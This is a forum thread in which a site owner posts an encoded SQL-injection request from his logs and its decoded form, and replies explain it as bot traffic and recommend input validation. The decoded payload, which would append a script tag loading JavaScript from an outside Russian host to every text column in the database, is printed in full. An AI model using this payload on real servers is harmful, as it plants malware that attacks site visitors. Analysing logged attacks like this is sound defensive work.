I found an odd looking request in my log files: "/default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c417265204054207641726368415228323535292c406320564152436861522832353529204445634c415245207461426c655f637552736f7220635552734f5220466f722073654c65637420412e4e414d652c622e4e614d452066724f6d207379736f624a4543747320612c735973634f6c756d4e73206220776845526520412e69643d422e496420616e4420412e58747950653d27552720616e642028622e78745970453d3939206f5220622e78545970653d3335204f7220622e78745970653d323331204f5220422e78547950653d31363729204f70654e205441424c455f437572736f52204665546368204e4578542046524f6d207441626c655f435572736f7220494e546f2040542c4063207748496c6528404046457443485f7354615455733d302920624567696e20657845632827557064617445205b272b40742b275d20536554205b272b40432b275d3d727472494d28436f4e7645725428766152436841522834303030292c5b272b40432b275d29292b63617354283078334337333633373236393730373432303733373236333344363837343734373033413246324637373737373732453639364536343635373836413733324537323735324637303631363736353245364137333345334332463733363337323639373037343345204153207641524368617228353229292729206645746368204e4578742066726f4d205441626c655f635552736f7220696e744f2040742c404320654e6420434c6f5345205461624c655f437552734f72204445614c6c6f43617465207441626c655f435572736f7220%20as%20varchar(4000));exec(@s);--" Using http://www.string-functions.com/hex-string.aspx, I converted the Hex code into this string: "/default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s= DeCLAre @T vArchAR(255),@c VARChaR(255) DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+ ‘<script src=http://www.indexjs.ru/page.js></script>’ ') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor %20as%20varchar(4000));exec(@s);--" It looks like they were poking around for a SQLServer instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? Dave
SQL Injection attempts. There are a lot of bots out there that send this kind of request. You'll see a lot of these.
Any Precautions We Should Take? Anything we should do to look for these? It was a 404 error, so my code handled it specially and logged it. I doubt the web server ever let the request get as far as executing SQL code...at least I hope so. Dave
Google "http://www.indexjs.ru/page.js" and you will find pages that apparently had this script link embedded in them when the page was googled. All that I checked now have this link removed. Wonder what this page.js does?
If the SQL injection is a valid request, the query could be run. We do have a Tipping Point intrusion protection device that has a database that is updated to block common exploit attempts, and it blocks millions of them every day. But devices like that are why these knuckleheads are obfuscating the request by encoding it - to try to get around blocks. The best thing you can do is insure that any form on your site that accepts user input validates or cleans the input to strip out anything malicious. That is the step that most people ignore, and that is how most SQL injections take hold.
